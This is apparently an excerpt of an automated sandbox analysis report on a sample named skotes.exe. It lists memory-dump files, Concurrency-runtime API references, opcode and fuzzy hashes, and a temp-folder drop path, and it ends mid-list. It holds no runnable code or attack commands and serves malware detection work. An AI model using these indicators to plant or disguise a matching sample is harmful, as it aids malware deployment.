                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ArrayList$DeleteHelperInternal
                                                          • String ID:
                                                          • API String ID: 3844194624-0
                                                          • Opcode ID: 8e82617df74c535b4aba1c86e243787e0b7b66a9049b2f5f521176abc5a35fba
                                                          • Instruction ID: 77753b43da20e253bf7f497fa3127c6f895a4a36bc2b646947d442ac06646856
                                                          • Opcode Fuzzy Hash: 8e82617df74c535b4aba1c86e243787e0b7b66a9049b2f5f521176abc5a35fba
                                                          • Instruction Fuzzy Hash: FF01F931300521BFCA357BA4C9D6D7DB76ABF447107000525F50597692DF61EC66E690
                                                          APIs
                                                          • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00C133DB
                                                          • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 00C133EF
                                                          • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00C13407
                                                          • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00C1341F
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                          • String ID:
                                                          • API String ID: 78362717-0
                                                          • Opcode ID: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
                                                          • Instruction ID: fc8f28540b8bd939f53d18d54a61ded9ccf9cc0ed3f8f508bce877d67fed2adc
                                                          • Opcode Fuzzy Hash: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
                                                          • Instruction Fuzzy Hash: 2401D632600554A7CF16EE558841AEF7BA9DF46354F100055FD22AB292DA71EF41B6A0
                                                          APIs
                                                          • Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00C09519
                                                            • Part of subcall function 00BFF4CB: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 00C05486
                                                          • Concurrency::details::ContextBase::CancelCollection.LIBCONCRT ref: 00C0953D
                                                          • Concurrency::details::_TaskCollectionBase::_FinishCancelState.LIBCMT ref: 00C09550
                                                          • Concurrency::details::ContextBase::CancelStealers.LIBCMT ref: 00C09559
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Base::Concurrency::details::$CancelContextScheduler$Collection$Base::_Concurrency::details::_CurrentDefaultFinishStateStealersTask
                                                          • String ID:
                                                          • API String ID: 218105897-0
                                                          • Opcode ID: 4615e97fafe502f6002d1074aebf71b8ed261496fd89dd89418fafc456e0ff3f
                                                          • Instruction ID: 9b86d2348745742aa05f8ada89534c23b4a3a075a69e9f903ae6bd70962ca87c
                                                          • Opcode Fuzzy Hash: 4615e97fafe502f6002d1074aebf71b8ed261496fd89dd89418fafc456e0ff3f
                                                          • Instruction Fuzzy Hash: 6FF0A030600A205EE662ABA99C12F6A23D4DF41715F00C51EE56B972C3CE74E986EB81
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, xrefs: 00C1DFE8
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                          • API String ID: 0-1726044199
                                                          • Opcode ID: c9a60ca6d2277d82f26eb712b2cc468ce131db0609015b0328afd9bd229460c4
                                                          • Instruction ID: cb0ea6c353862d4a9b7349d77df1eeaf208bcb77cc83ffd393f2e178431f5cb1
                                                          • Opcode Fuzzy Hash: c9a60ca6d2277d82f26eb712b2cc468ce131db0609015b0328afd9bd229460c4
                                                          • Instruction Fuzzy Hash: 9E21C271604219AFDB30AE658C80EEB73ADAF473647104615FD28C6241E771EDC0B7A1
                                                          APIs
                                                          • Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 00C11764
                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00C117AF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
                                                          • String ID: pContext
                                                          • API String ID: 3390424672-2046700901
                                                          • Opcode ID: 1aba6a7d104b4d9c6a605fb91b24086d5e9f2b705e9587f1c6c49e5d9931c0bb
                                                          • Instruction ID: 83d3ed6c5e0346e177a10d515315f59fc5cfcda1bbc352985b6ad9ee55fbe365
                                                          • Opcode Fuzzy Hash: 1aba6a7d104b4d9c6a605fb91b24086d5e9f2b705e9587f1c6c49e5d9931c0bb
                                                          • Instruction Fuzzy Hash: C2112936A102149BCB15FF28C4846ED77A5AF86360B1D4065EE12E73C1DB38DE81EBD0
                                                          APIs
                                                          • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 00C0B94E
                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00C0B961
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
